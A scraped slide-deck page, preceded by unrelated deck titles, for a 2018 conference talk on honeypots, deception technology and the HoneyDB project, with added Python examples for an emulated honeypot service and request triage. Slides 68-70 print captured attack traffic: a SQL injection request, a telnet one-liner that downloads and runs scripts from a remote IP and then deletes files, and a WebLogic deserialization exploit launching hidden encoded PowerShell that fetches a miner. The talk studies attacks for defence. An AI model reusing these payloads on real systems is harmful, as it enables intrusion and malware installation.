Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 

Honeypots, Deception, and Frankenstein

  • 2. BIO
    Career Summary
    ● WebDev, DBA, SA, IT Auditor (~7 yrs)
    ● AppSec in Financials, EY & GS (~9 yrs)
    On the socials
    ● Twitter: @foospidy
    ● Github: http://github.com/foospidy
    ● LinkedIn: http://linkedin.pxmx.io
    ● Blog: http://pxmx.io
    Phillip Maddux, Trusted AppSec Advisor and Senior Solutions Engineer @ Signal Sciences, https://signalsciences.com
    SOURCE Boston 2018
  • 3. Agenda of the Cybers
    ● Honeypots 101
    ● Cyber Deception
    ● HoneyPy - Quick Update
    ● Frankenstein (HoneyDB Project)
    ● Q&A
  • 4. Honeypots 101
    A networked computer configured to look like a legitimate system, but its real purpose is to discover and/or track attackers.
    Types of Honeypots:
    - Production
    - Research
    Levels of Interaction:
    Low: Emulated services, very limited interaction, no login capability (low risk).
    Medium: Emulated services, emulated login, emulated commands.
    High: Actual services, system logins, and commands (very risky).
  • 5. Honeypots 101 - Production Honeypots
    Production honeypots are computers on the network that have no legitimate business purpose and should never see any traffic, unless…
    - Something is misconfigured on the network
    - A malicious actor is on the network
    Production honeypots are an additional layer to your defense strategy.
    - Honeypot logs are low volume and high value
    - Honeypots introduce risk to the attacker
  • 6. Honeypots 101 - Research Honeypots
  • 7. Honeypots 101 - Production Honeypots
    Additional layer to…
    Preventative controls
    - Network & application firewalls
    - Intrusion prevention systems
    - Patch management
    - Network compartmentalization
    - Anti-virus
    Detective controls
    - Intrusion detection systems
    - Network traffic analysis
    - Endpoint monitoring
    Control validation
    - Vulnerability scans
    - Audits
    - Penetration testing
    - Control performance monitoring
    Honeypots
    - Produce low volumes of data compared to the volumes of data from all other preventative and detective controls
  • 8. Honeypots 101 - Research Honeypots
    Research honeypots can have many purposes; it just depends on what the research goals are.
    Examples:
    - Identify sources of malicious traffic
    - Discover active malware, botnets, and C&C servers
    - Learn about attacker techniques & tools
  • 9. Honeypots 101 - Research Honeypots
    [Diagram; labels: Bots, Scanners, Malware, DDoS, Botnets, etc., Internet]
  • 10. Honeypots 101 - Research Honeypots
    ShmooCon 2015, Andrew Morris (@Andrew___Morris): No Budget Threat Intelligence - Tracking Malware Campaigns on the Cheap
    - Reversing malware
    - Uncovering C2 servers
    - Uncovering imminent DDoS attacks
    Presentation video
    Now doing really cool stuff with… GreyNoise (https://greynoise.io/)
  • 11. Honeypots 101 - Hobbyist Honeypots
    - Try it out.
    - It’s fun!
    This is not me. (this is totally me)
  • 13. The First Rule of Cyber Deception
  • 14. Image Source You Must Show This Image
  • 15. Deception
    Deception technology automates the creation of traps (decoys) and/or lures which are mixed among and within existing IT resources to provide a layer of protection to stop attackers that have penetrated the network. Traps (decoys) are IT assets that either use real licensed operating system software, or are emulations of these devices. [1]
    1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
  • 16. Deception Automation
    Automation for:
    - Deploying deception endpoints as VMs, containers, or processes.
    - Configuration of deception endpoints.
    Centralized management interface, or API driven.
  • 17. Deception Lures
    Lures (aka breadcrumbs)
    - Lures are generally real information technology resources (files of varying kinds) which are placed on actual IT assets. [1]
    - Credentials to network resources or applications.
    - Shortcuts to applications or other services, e.g. FTP, Telnet, SSH.
    - Browser artifacts, e.g. history, favorites, cookies.
    - Database connection strings
    - Network drives
    - etc.
    1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
  • 18. Deception Solutions
    Very fancy implementations of honeypots
  • 19. Deception Layers
    Network services - SSH, Telnet, FTP, etc.
    Applications - cookies, directories, logins, functionality, etc.
    Data - watermarks, triggers, records access, etc.
  • 20. Deception in Applications
    2017, Herb Todd: Tangled Web: Defense in Deception
    - The goals of deception from the perspective of both the attacker and defender
    - The elements and processes needed to plan, prepare, execute, and monitor effective deception
    - The types of deception techniques that are effective and how they translate into actual web application capabilities
    - How to identify and respond to various types of attackers.
    Presentation video
    My takeaway - a tailored solution is needed
  • 22. Deception Goal
    Integrate deception throughout your network and applications so you become a high risk to attackers
  • 23. Deception Market
    Approximately 20 companies
    Raised at least 201 million dollars
    Top 5 funded range 19 million to 46 million
    2 acquisitions
    All this over the last 4, maybe 5 years
    Numbers based on data from crunchbase.com as of Fall 2017
  • 24. Deception Challenges
    The concept of honeypots & deception has been around for years
    The Cuckoo’s Egg - 1989
    Bsides Raleigh 2017 (now Bsides RDU) source
  • 25. Deception Challenges
    Why isn’t everyone already doing deception?
  • 27. Deception Challenges
    Over the last 10 to 15 years organizations have focused on getting the basics done…
    ● Vulnerability Assessment
    ● Patch Management
    ● Endpoint protection
    ● Network Monitoring (IDS/IPS)
    ● Controls Validation
    ● Security awareness / training
    Deception
    ● No resources
    ● Not a priority
    ● Not fully understood
  • 28. Deception Challenges
    However, as organizations become more mature in their security programs they are now thinking about deception…
    What does a deception program look like for their organization?
  • 29. Deception Program
    Initial thoughts…
    ● Scope… intruder vs. insider, or both?
    ● Output… alerts vs. counter intelligence, or both?
    ● Coverage… external vs. internal, or both?
    ● Assets… network, applications, data?
    ● Validation… metrics and testing.
    ● Incident response… integration and prioritization.
    Audit & Compliance?
  • 30. Deception Challenges
    Some other challenges…
    ● Some existing solutions are heavy/complex to deploy (also operational risk).
    ● Lures & breadcrumb management.
    ● Vulnerability scans reporting on sensors.
    ● Deception data risk (data is fake, incident is real).
    ● External facing deception can have an impact on security scorecard.
    ● How to implement deception in 3rd party vendor environments.
  • 31. Deception Takeaways
    Get the basics covered first
    Think about your deception story (program)
    Investigate solutions that are right sized for your organization’s maturity level
    A solution needs to:
    - have capability to be tailored
    - be easy to deploy
    - be easy to automate and integrate
    - be light weight / low touch to manage
  • 34. HoneyPy
    - Low to medium interaction honeypot.
    - Plugin based to implement various network services (tcp or udp).
    - Open source, on Github https://github.com/foospidy/HoneyPy
    - Written in Python.
    - Plugins - https://github.com/foospidy/HoneyPy/tree/master/plugins
    - Service config - https://github.com/foospidy/HoneyPy/blob/master/etc/services.cfg
    - Integrations (loggers) - https://github.com/foospidy/HoneyPy/tree/master/loggers
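A minimal plugin-style, low-interaction TCP service of the kind slides 4 and 34 describe, added here as an example rather than HoneyPy's own code: the plugin registry, the event shape and the `run_probe` helper are hypothetical, and the probe it sends to itself is constructed. No login ever succeeds and nothing the client sends is executed; the value is the one JSON event per connection that a logger integration would forward.

```python
import asyncio
import json
from datetime import datetime, timezone

# Plugin registry (hypothetical, not HoneyPy's plugin API): each entry is the
# banner sent on connect and a function that turns client input into a reply.
PLUGINS = {
    "telnet": {
        "banner": b"login: ",
        "reply": lambda data: b"Login incorrect\r\nlogin: ",
    },
    "http": {
        "banner": b"",
        "reply": lambda data: b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n",
    },
}


class LowInteractionService:
    """One emulated TCP service; events collect in memory (a logger would ship them)."""

    def __init__(self, service: str, max_bytes: int = 4096, timeout: float = 2.0):
        self.service = service
        self.plugin = PLUGINS[service]
        self.max_bytes = max_bytes      # cap what a single probe can make us buffer
        self.timeout = timeout          # silent clients are recorded and dropped
        self.events = []

    async def handle(self, reader, writer):
        peer = writer.get_extra_info("peername")
        local = writer.get_extra_info("sockname")
        if self.plugin["banner"]:
            writer.write(self.plugin["banner"])
            await writer.drain()
        try:
            data = await asyncio.wait_for(reader.read(self.max_bytes), self.timeout)
        except asyncio.TimeoutError:
            data = b""
        # Hex keeps the raw bytes intact; the printable copy is for a human reading the log.
        self.events.append({
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "service": self.service,
            "remote_host": peer[0],
            "remote_port": peer[1],
            "local_port": local[1],
            "data_hex": data.hex(),
            "data_printable": data.decode("ascii", errors="replace"),
        })
        if data:
            writer.write(self.plugin["reply"](data))
            await writer.drain()
        writer.close()
        await writer.wait_closed()

    async def serve_once(self, probe: bytes, host: str = "127.0.0.1"):
        """Bind an ephemeral port, probe ourselves once, and return what both sides saw."""
        server = await asyncio.start_server(self.handle, host, 0)
        port = server.sockets[0].getsockname()[1]
        reader, writer = await asyncio.open_connection(host, port)
        banner = await reader.read(1024) if self.plugin["banner"] else b""
        writer.write(probe)
        await writer.drain()
        reply = await reader.read(1024)
        writer.close()
        await writer.wait_closed()
        server.close()
        await server.wait_closed()
        return banner, reply, self.events[-1]


def format_event(event: dict) -> str:
    """One JSON line per connection, the shape a logger integration would forward."""
    return json.dumps(event, sort_keys=True)


def run_probe(service: str, probe: bytes):
    """Synchronous wrapper: emulate `service`, send `probe`, return (banner, reply, event)."""
    return asyncio.run(LowInteractionService(service).serve_once(probe))


if __name__ == "__main__":
    banner, reply, event = run_probe("telnet", b"root\r\n")   # constructed probe
    print(format_event(event))
```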
  • 35. HoneyDB
    HoneyDB is a community driven honeypot data aggregation service. HoneyDB collects and publishes honeypot data via its web site and APIs.
    honeydb.io (redirects to riskdiscovery.com/honeydb)
  • 36. HoneyDB - Features
    Data visualization…
  • 38. HoneyDB - Features
    Threat Information
    - Bad-hosts
    - Sensor Data
    - Twitter Threat Feed
  • 40. HoneyDB - Original Architecture
    [Diagram; labels: Web, API]
  • 41. HoneyDB - Scale Problem
    [Diagram; labels: Web, API]
  • 42. HoneyDB - Reliability Problem
    Fun reading…
    http://www.cloudatacost.com/mystory
    https://www.reddit.com/r/CloudAtCost/
  • 43. HoneyDB - $$$?
    Decent web servers and data storage could run about $400-$500 per month.
    Current 90 day storage: 50 GB
  • 44. HoneyDB - How To Get $$$?
    Idea… Honeypots As A Service (HaaS)
  • 45. HoneyDB - How To Get $$$?
    Idea… Honeypots As A Service (HaaS)
  • 46. HoneyDB - You Have To HaaS it!
    Attempt a demo.
  • 47. HoneyDB - Turns Out… You Don’t Have To HaaS it!
    Or nobody wants to HaaS it =(
  • 48. HoneyDB - But Wait, CarolinaCon Connection!
    http://novcon.net/
    Offered VMs for free!
    btw… they also operate the threat info project.
  • 49. HoneyDB - Reliable Servers
    But still need to scale
  • 51. HoneyDB - Frankenstein Cloud Architecture
    “Frankenstein scaaaaaaaaaaaaale” - Frankenstein
  • 52. HoneyDB - Frankenstein Cloud Architecture
  • 53. HoneyDB - Frankenstein Cloud Architecture
    [Architecture diagram; components: Serverless (functions), Google Cloud BigQuery, PubSub, Novcon VMs, HoneyDB web / API, MySQL (Primary), MySQL (Secondary), Redis - API Request Limiting; labelled flows: get hmac, post events, pull events, pull tweets, replicate, query, inserts, stream events, Coming soon]
  • 54. HoneyDB - What about... Blockchain?
  • 56. HoneyDB - Note On Serverless Functions
    IBM Cloud Functions is THE BEST - deploy easily/quickly, lowest cost.
    AWS Lambda is good - robust, but expensive… API gateway charges.
    Google Cloud Functions is disappointing - easy to deploy, only nodejs, but… Google functions using Google library talking to Google PubSub resulted in tons of errors. Wait. What? Why?
    Azure Cloud Functions is WTF - couldn’t get dependencies to install, never got it running, couldn’t waste more time with it.
  • 57. HoneyDB - Ok, So What Does It Cost?
  • 58. HoneyDB - Ok, So What Does It Cost?
  • 59. HoneyDB - How To Money?
    Cryptocurrency Mining...
  • 60. HoneyDB - How To Money?
    Not practical, but wrote a cool script... HoneyMiner https://github.com/foospidy/HoneyMiner
  • 61. HoneyDB - How To Money?
    Masternodes…
    Greater privacy of transactions
    Performing immediate transactions
    Participation in proceedings and voting
    Activate budgeting and cashier system in cryptocurrencies
  • 62. HoneyDB - How To Money?
    Currently running 5 masternodes across 2 VPS
    Yields about $100 to $200 per month.
  • 63. HoneyDB - But that crypto though.
    Masternodes have potential, but require an initial investment and are at the mercy of market volatility.
  • 64. HoneyDB - How to money?
    Other options…
    Sponsorships
    Commercial Licensing
  • 65. HoneyDB - Back To HaaS
    Tools to get you honeypotting
    ● Honeydb-agent
      ○ Like HoneyPy, but a binary
    ● API Endpoints
    ● HoneyDB CLI
  • 66. HoneyDB - New API Client Wrapper and CLI
    pip install honeydb
    usage: honeydb [-h] [--bad-hosts] [--sensor-data-count] [--sensor-data]
                   [--threatbin] [--twitter-threat-feed] [--mydata] [--date DATE]
                   [--ip-address IP_ADDRESS] [--from-id FROM_ID] [--pretty]
    optional arguments:
      -h, --help               show this help message and exit
      --bad-hosts              Get bad hosts.
      --sensor-data-count      Get sensor data count.
      --sensor-data            Get sensor data.
      --threatbin              Get ThreatBin entries.
      --twitter-threat-feed    Get Twitter Threat Feed.
      --mydata                 Filter on mydata.
      --date DATE              Date in format YYYY-MM-DD
      --ip-address IP_ADDRESS  IP address to filter on.
      --from-id FROM_ID        ID to continue retrieving sensor data.
      --pretty                 Print JSON in pretty format.
  • 68. HoneyDB - Examples...
    Web
    GET /hcl/inc/install/checkout.asp?cartid1111111111111'%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR (45,120,50,45,81,45)--%20%20 HTTP/1.1
    Host: x.x.x.x
    Accept: */*
    Telnet
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.76.233.99/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.76.233.99 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.76.233.99; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.76.233.99 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
  • 69. HoneyDB - Examples... POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 64.137.163.142:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0 Connection: Close Content-Type: text/xml Content-Length: 1216 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALg BDAGEAcAB0AGkAbwBuADsAJABXAEMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVwBDAC4ASABlAGEAZABlAHIAc wAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAiAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADIALgAwACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQw AuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMwAuADUAOQAuADYAOAAuADEANwAyAC8AQwBhAGMAaABlAC8ARABMAC4 AcABoAHAAJwApADsA</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header>
  • 70. HoneyDB - Examples... $.O.S.=.(.G.e.t.-.W.m.i.O.b.j.e.c.t. .-.C.l.a.s.s. .W.i.n.3.2._.O.p.e.r.a.t.i.n.g.S.y.s.t.e.m.)...C.a.p.t.i.o.n.;.$.W .C.=.N.e.w.-.O.b.j.e.c.t. .N.e.t...W.e.b.C.l.i.e.n.t.;.$.W.C...H.e.a.d.e.r.s...A.d.d.(.'.U.s .e.r.-.A.g.e.n.t.'.,.".P.o.w.e.r.S.h.e.l.l. .v.2...0. .$.O.S.".).;.I.E.X. .$.W.C...D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.'.h.t.t.p.:././.1.2.3...5.9 ...6.8...1.7.2./.C.a.c.h.e./.D.L...p.h.p.'.).;.
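A triage helper for captured requests like those on slides 68 to 70, added here as an example and not HoneyDB's code: it percent-decodes the request line, flags a UNION-based SQL injection probe, and recovers an encoded PowerShell command by base64-decoding the blob and reading it as UTF-16LE, which is why the straight decode on slide 70 shows a dot between every character. The two requests, the PowerShell text and the placeholder host are constructed.

```python
import base64
import re
from urllib.parse import unquote_plus

# PowerShell's -E / -Enc / -EncodedCommand switch takes base64 of the command
# encoded as UTF-16LE. Whitespace is allowed inside the blob because captured
# copies are often line-wrapped; it is stripped before decoding.
ENCODED_RE = re.compile(r"-(?:E|Enc|EncodedCommand)\s+([A-Za-z0-9+/=\s]{16,})", re.IGNORECASE)
SQLI_RE = re.compile(r"\bunion\b[\s\S]{0,40}?\bselect\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def decode_encoded_command(blob: str):
    """Base64 -> bytes -> UTF-16LE text. Returns None if the blob is not valid."""
    try:
        return base64.b64decode(re.sub(r"\s+", "", blob)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def naive_decode(blob: str) -> str:
    """What slide 70 shows: base64 decoded and read as single-byte text, so every
    other byte is a NUL (rendered here as a dot) because the real encoding is UTF-16LE."""
    raw = base64.b64decode(re.sub(r"\s+", "", blob))
    return raw.decode("latin-1").replace("\x00", ".")


def triage(request: str) -> dict:
    """Summarise one captured HTTP request: decoded request line, SQLi flag,
    recovered PowerShell command and every URL found in either."""
    request_line = request.splitlines()[0] if request else ""
    decoded_line = unquote_plus(request_line)
    findings = {
        "request_line": decoded_line,
        "sql_injection": bool(SQLI_RE.search(decoded_line)),
        "encoded_powershell": None,
        "urls": [],
    }
    urls = URL_RE.findall(decoded_line)
    match = ENCODED_RE.search(request)
    if match:
        command = decode_encoded_command(match.group(1))
        findings["encoded_powershell"] = command
        if command:
            urls += URL_RE.findall(command)
    findings["urls"] = list(dict.fromkeys(urls))   # dedupe, keep order
    return findings


# Constructed samples modelled on slides 68 and 69; hosts are placeholders.
SAMPLE_SQLI_REQUEST = (
    "GET /checkout.asp?cartid=1'%20UNION%20SELECT%20CHAR(45,120,49,45,81,45)--%20 HTTP/1.1\r\n"
    "Host: honeypot.example\r\nAccept: */*\r\n\r\n"
)
SAMPLE_PS_COMMAND = (
    "$OS=(Get-WmiObject -Class Win32_OperatingSystem).Caption;"
    "(New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage.ps1')"
)
SAMPLE_PS_B64 = base64.b64encode(SAMPLE_PS_COMMAND.encode("utf-16-le")).decode("ascii")
SAMPLE_POST_REQUEST = (
    "POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\nHost: honeypot.example:7001\r\n\r\n"
    "<string>PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E " + SAMPLE_PS_B64 + "</string>"
)

if __name__ == "__main__":
    for sample in (SAMPLE_SQLI_REQUEST, SAMPLE_POST_REQUEST):
        print(triage(sample))
    print(naive_decode(SAMPLE_PS_B64)[:24])
```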
  • 71. HoneyDB - @MalwareMechanic
    ● I analyzed the initial POST you sent me. From there I was able to pull apart a scanner/worm/RAT!
    ● It appears to be GhostMiner to mine Monero!
  • 72. HoneyDB - Hmmmmm...
    $ cat GhostMiner >> HoneyMiner
  • 73. HoneyDB - No no no no...
  • 74. HoneyDB - @MalwareMechanic
    ● This POST utilizes a Java deserialization vulnerability to execute a base64 encoded PowerShell command.
    ● This in turn downloads and executes a PowerShell script (hxxp://123.59.68.172/Cache/DL.php).
    ● Installs a cryptominer via WMI.
    ● Attempts to stop the various services & tasks before installing the new miner.
    ● Attempts to stop other miners.
    ● Attempts to stop processes listening on specific ports.
    ● Also saw references to powershell_reflective_mimikatz.
  • 75. HoneyDB - Go Forth and Honeypot!
    honeydb.io
    Thanks! Questions?